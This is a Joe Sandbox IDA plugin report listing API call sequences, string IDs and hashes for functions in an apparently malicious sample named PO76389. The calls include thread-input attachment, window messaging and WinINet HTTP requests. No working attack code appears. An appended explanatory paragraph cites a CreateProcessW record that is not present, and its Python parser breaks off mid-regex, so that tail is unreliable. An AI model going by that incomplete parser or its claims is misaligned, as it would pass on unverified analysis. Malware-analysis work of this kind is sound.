                                                    • Opcode Fuzzy Hash: 7dda052996b7e94b4a6849d8ce6a78f7a4bb99abc73972705e0e47b969186c1a
                                                    • Instruction Fuzzy Hash: 18416A75A00209EFEB10EF68E894BDABBF5FF49344F140029E945A7351D730A954EF60
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 004FEC1E
                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 004FEC94
                                                    • GetLastError.KERNEL32 ref: 004FEC9E
                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 004FED0B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                    • API String ID: 4194297153-14809454
                                                    • Opcode ID: 398ba347ec7bb1d7c614a92cf16d5a8e9ad0b5f6ed27bd45b2c8bf3be269e0f6
                                                    • Instruction ID: 07ded8a3dd63178c0a63ec8b03525226bf2a069b54b16d75e292f749b04d3571
                                                    • Opcode Fuzzy Hash: 398ba347ec7bb1d7c614a92cf16d5a8e9ad0b5f6ed27bd45b2c8bf3be269e0f6
                                                    • Instruction Fuzzy Hash: 7331E135A002499FC700EF66C845ABABBB4FF44701F10402BF601D73A1DA799D42DB95
                                                    APIs
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 004EC782
                                                    • GetDlgCtrlID.USER32 ref: 004EC78D
                                                    • GetParent.USER32 ref: 004EC7A9
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 004EC7AC
                                                    • GetDlgCtrlID.USER32(?), ref: 004EC7B5
                                                    • GetParent.USER32(?), ref: 004EC7D1
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 004EC7D4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 313823418-1403004172
                                                    • Opcode ID: ea300f14d533173d55a9471da424980e5953d83e4ba77b4597ac4f7a983aaa9e
                                                    • Instruction ID: ca8cf07a9b074c4ead5b658a51dd7b49c64bd799e826e5ae5c104476c19df93d
                                                    • Opcode Fuzzy Hash: ea300f14d533173d55a9471da424980e5953d83e4ba77b4597ac4f7a983aaa9e
                                                    • Instruction Fuzzy Hash: BA21B074900209AFCF04ABA5CCC6EFEBB75EB55301F10011AF562932D1DBB9581AEB24
                                                    APIs
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004EC869
                                                    • GetDlgCtrlID.USER32 ref: 004EC874
                                                    • GetParent.USER32 ref: 004EC890
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 004EC893
                                                    • GetDlgCtrlID.USER32(?), ref: 004EC89C
                                                    • GetParent.USER32(?), ref: 004EC8B8
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 004EC8BB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 313823418-1403004172
                                                    • Opcode ID: 96e8009b9c241a463c9951a5502659b020eb4d6519494c6f8aedc82e55a192d0
                                                    • Instruction ID: be086e8fea26c45e8229d30b0eda16cab9b11a507861ab1add5603f9a1bb2a4f
                                                    • Opcode Fuzzy Hash: 96e8009b9c241a463c9951a5502659b020eb4d6519494c6f8aedc82e55a192d0
                                                    • Instruction Fuzzy Hash: 1421A171900208ABDF04ABA6CCC6EFEBB75EB55301F100056F551A3291DBB9581AAB24
                                                    APIs
                                                    • GetParent.USER32 ref: 004EC8D9
                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 004EC8EE
                                                    • _wcscmp.LIBCMT ref: 004EC900
                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004EC97B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                    • API String ID: 1704125052-3381328864
                                                    • Opcode ID: ec48a76ddadd25e3dd186eea87036d3296dd506521610ea3416df76186fe436f
                                                    • Instruction ID: fbf24216ad5191ff708643d250120eb16bfde321beb3ed8ab13f4b4099dd6a73
                                                    • Opcode Fuzzy Hash: ec48a76ddadd25e3dd186eea87036d3296dd506521610ea3416df76186fe436f
                                                    • Instruction Fuzzy Hash: 55113AB7248782B9FA042A32EC47CA77BACDF12324B200017F910A61E3FB6968034568
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 0050B777
                                                    • CoInitialize.OLE32(00000000), ref: 0050B7A4
                                                    • CoUninitialize.COMBASE ref: 0050B7AE
                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 0050B8AE
                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 0050B9DB
                                                    • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 0050BA0F
                                                    • CoGetObject.OLE32(?,00000000,0053D91C,?), ref: 0050BA32
                                                    • SetErrorMode.KERNEL32(00000000), ref: 0050BA45
                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0050BAC5
                                                    • VariantClear.OLEAUT32(0053D91C), ref: 0050BAD5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                    • String ID:
                                                    • API String ID: 2395222682-0
                                                    • Opcode ID: 4e7e28130ef20f85ebc024fc10cf474bd04de71161ab0475c634d58c0143b421
                                                    • Instruction ID: e06cb881069376ca385fdc696ae478b3c33a74e76331130f1e15b96e3ecc304b
                                                    • Opcode Fuzzy Hash: 4e7e28130ef20f85ebc024fc10cf474bd04de71161ab0475c634d58c0143b421
                                                    • Instruction Fuzzy Hash: ACC10371604305AFD700DF69C884A6ABBF9FF88348F04495DF98A9B291DB71ED05CB62
                                                    APIs
                                                    • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 004FB137
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ArraySafeVartype
                                                    • String ID:
                                                    • API String ID: 1725837607-0
                                                    • Opcode ID: 32ed3f6c74122d3b03088169c2b4c40ad233e1272bca75a89846e3e2d72e0231
                                                    • Instruction ID: 57cd0b816b5e0bc12e5ba722ddc3879b39282fb8c90e61c8b38e82fc502ad7f5
                                                    • Opcode Fuzzy Hash: 32ed3f6c74122d3b03088169c2b4c40ad233e1272bca75a89846e3e2d72e0231
                                                    • Instruction Fuzzy Hash: 2CC18C75A0021ADFDB00CF98D485BBEB7B4EF0A315F24406BEA05E7341C778A945CB99
                                                    APIs
                                                    • __lock.LIBCMT ref: 004DBA74
                                                      • Part of subcall function 004D8984: __mtinitlocknum.LIBCMT ref: 004D8996
                                                      • Part of subcall function 004D8984: RtlEnterCriticalSection.NTDLL(004D0127), ref: 004D89AF
                                                    • __calloc_crt.LIBCMT ref: 004DBA85
                                                      • Part of subcall function 004D7616: __calloc_impl.LIBCMT ref: 004D7625
                                                      • Part of subcall function 004D7616: Sleep.KERNEL32(00000000,?,004D0127,?,004B125D,00000058,?,?), ref: 004D763C
                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 004DBAA0
                                                    • GetStartupInfoW.KERNEL32(?,00566990,00000064,004D6B14,005667D8,00000014), ref: 004DBAF9
                                                    • __calloc_crt.LIBCMT ref: 004DBB44
                                                    • GetFileType.KERNEL32(00000001), ref: 004DBB8B
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 004DBBC4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                    • String ID:
                                                    • API String ID: 1426640281-0
                                                    • Opcode ID: e07ebc8dc6fc4b3733227a0cc1ccad30b88eef3a44162bf4684578cd1d7ca9e5
                                                    • Instruction ID: a44fd74af1349cee43199316589ab66ddf802750579745519281aa80ecb535c0
                                                    • Opcode Fuzzy Hash: e07ebc8dc6fc4b3733227a0cc1ccad30b88eef3a44162bf4684578cd1d7ca9e5
                                                    • Instruction Fuzzy Hash: 4A81E170904305CFCB20CF68D8606AABBF0FB19724B24425FD4A6AB3D1C7389843DB99
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 004F4A7D
                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4A91
                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 004F4A98
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4AA7
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 004F4AB9
                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4AD2
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4AE4
                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4B29
                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4B3E
                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,004F3AD7,?,00000001), ref: 004F4B49
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                    • String ID:
                                                    • API String ID: 2156557900-0
                                                    • Opcode ID: a7ccf54273b95c7dec131c3a2ce62714609035bd08b430cced3abde060099737
                                                    • Instruction ID: c95591f01db98676c533d18cd764f11934ad7000baa8604abed98d45d52a0733
                                                    • Opcode Fuzzy Hash: a7ccf54273b95c7dec131c3a2ce62714609035bd08b430cced3abde060099737
                                                    • Instruction Fuzzy Hash: 27318671510208ABDB109F54EC85B7B777DABA0321F144006FB05D7360DBB8ED88BB65
                                                    APIs
                                                    • GetClientRect.USER32(?), ref: 0052EC32
                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0052EC49
                                                    • GetWindowDC.USER32(?), ref: 0052EC55
                                                    • GetPixel.GDI32(00000000,?,?), ref: 0052EC64
                                                    • ReleaseDC.USER32(?,00000000), ref: 0052EC76
                                                    • GetSysColor.USER32(00000005), ref: 0052EC94
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                    • String ID:
                                                    • API String ID: 272304278-0
                                                    • Opcode ID: a4dcb27ad6934269a9aab284289d72bb8d453bec713e7eb479178664e8435393
                                                    • Instruction ID: 8d51493b739c068758ab3b43c55b6ea8d897eb510573e06dc3247bff80d946fc
                                                    • Opcode Fuzzy Hash: a4dcb27ad6934269a9aab284289d72bb8d453bec713e7eb479178664e8435393
                                                    • Instruction Fuzzy Hash: 8D215C31500204AFDB61ABB4FC4AFAA7B75FB15321F104225FA26A52E1CB310959EF21
                                                    APIs
                                                    • EnumChildWindows.USER32(?,004EDD46), ref: 004EDC86
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ChildEnumWindows
                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                    • API String ID: 3555792229-1603158881
                                                    • Opcode ID: 86ec5af36138f8792088f0ada940664bfc7e49080878bade63d60e39a4c99051
                                                    • Instruction ID: f9c3f43dda08b18c0baeefa39467f65c19fc5c36e19d9d25b033bcd47158152f
                                                    • Opcode Fuzzy Hash: 86ec5af36138f8792088f0ada940664bfc7e49080878bade63d60e39a4c99051
                                                    • Instruction Fuzzy Hash: 4D91E730E005469ACB08DF62C481BEAFBB5FF14344F54811FD84AA7291DF78694ADBA8
                                                    APIs
                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004B45F0
                                                    • CoUninitialize.COMBASE ref: 004B4695
                                                    • UnregisterHotKey.USER32(?), ref: 004B47BD
                                                    • DestroyWindow.USER32(?), ref: 00525936
                                                    • FreeLibrary.KERNEL32(?), ref: 0052599D
                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 005259CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                    • String ID: close all
                                                    • API String ID: 469580280-3243417748
                                                    • Opcode ID: 34f93a55f02a61d685bfc71ed36ee55256eebcdf4c4a6c1064c034be35abb830
                                                    • Instruction ID: 2cc9d06b9744403f3f5a6cf5c3e1b87b778d6ca98ccbc569fffbc1c2db5a62d9
                                                    • Opcode Fuzzy Hash: 34f93a55f02a61d685bfc71ed36ee55256eebcdf4c4a6c1064c034be35abb830
                                                    • Instruction Fuzzy Hash: F2915034600502CFC715EF15D995BA9F7B4FF15704F1042AEE40A572A2DB38AE56DF28
                                                    APIs
                                                    • SetWindowLongW.USER32(?,000000EB), ref: 004CC2D2
                                                      • Part of subcall function 004CC697: GetClientRect.USER32(?,?), ref: 004CC6C0
                                                      • Part of subcall function 004CC697: GetWindowRect.USER32(?,?), ref: 004CC701
                                                      • Part of subcall function 004CC697: ScreenToClient.USER32(?,?), ref: 004CC729
                                                    • GetDC.USER32 ref: 0052E006
                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0052E019
                                                    • SelectObject.GDI32(00000000,00000000), ref: 0052E027
                                                    • SelectObject.GDI32(00000000,00000000), ref: 0052E03C
                                                    • ReleaseDC.USER32(?,00000000), ref: 0052E044
                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0052E0CF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                    • String ID: U
                                                    • API String ID: 4009187628-3372436214
                                                    • Opcode ID: 710593551498f0e87efc7263a55e1cf3ca2254c950c6fec0b52d6997b7be0a3c
                                                    • Instruction ID: 3165d0094ba9449658545ced893d91afc25b77eaf20b33feeda247b9ac305270
                                                    • Opcode Fuzzy Hash: 710593551498f0e87efc7263a55e1cf3ca2254c950c6fec0b52d6997b7be0a3c
                                                    • Instruction Fuzzy Hash: D2710435900208DFCF21CF64E889AEA7FB5FF5A310F14426AED595A2E5C7318C42EB65
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00504C5E
                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00504C8A
                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00504CCC
                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00504CE1
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00504CEE
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00504D1E
                                                    • InternetCloseHandle.WININET(00000000), ref: 00504D65
                                                      • Part of subcall function 005056A9: GetLastError.KERNEL32(?,?,00504A2B,00000000,00000000,00000001), ref: 005056BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                    • String ID:
                                                    • API String ID: 1241431887-3916222277
                                                    • Opcode ID: 96617d934b5a76efa6363a4d62ba7228faac34eb7c73931d629bd851c866b714
                                                    • Instruction ID: cd456a6d29502bfeca12e4c47583f02712e3c9e25360fafe0e85f1c624227d45
                                                    • Opcode Fuzzy Hash: 96617d934b5a76efa6363a4d62ba7228faac34eb7c73931d629bd851c866b714
                                                    • Instruction Fuzzy Hash: 6B414AB2501619BFEB129F60DD89FBF7BACFB48354F10411AFA019A291E7709D449BA0
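The records above are easiest to work with once they are structured: which function calls which API, which calls are made directly versus inside a callee ("Part of subcall function"), and which Instruction ID the record carries. The following parser is an added example, not part of the Joe Sandbox report or its IDA plugin; the SAMPLE text is a copy of the WinINet record just above and the CreateProcessW record further down, the regexes, class names and helper names (parse_listing, callers_of, wininet_options) are assumptions made here rather than a published format specification, and the small INTERNET_OPTION table covers only the dwOption indices named in it. Note that InternetSetOptionW's third parameter is lpBuffer, a pointer, so the listing alone does not establish which SECURITY_FLAG_* bits the sample writes.

```python
"""Parse a Joe Sandbox function listing ('APIs' / 'Similarity' records) into
structured records so the API call sequences can be queried.

Added example, not code from the Joe Sandbox report. SAMPLE below is a copy
of two records from the listing; the regexes and helper names are assumptions
made here, not a documented Joe Sandbox format.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# One API call line, e.g. "• InternetConnectW.WININET(?,...,00000000), ref: 00504C5E"
# or the parenthesis-less form "• GetDC.USER32 ref: 0052E006".
# "Part of subcall function XXXXXXXX:" marks a call made inside a callee.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
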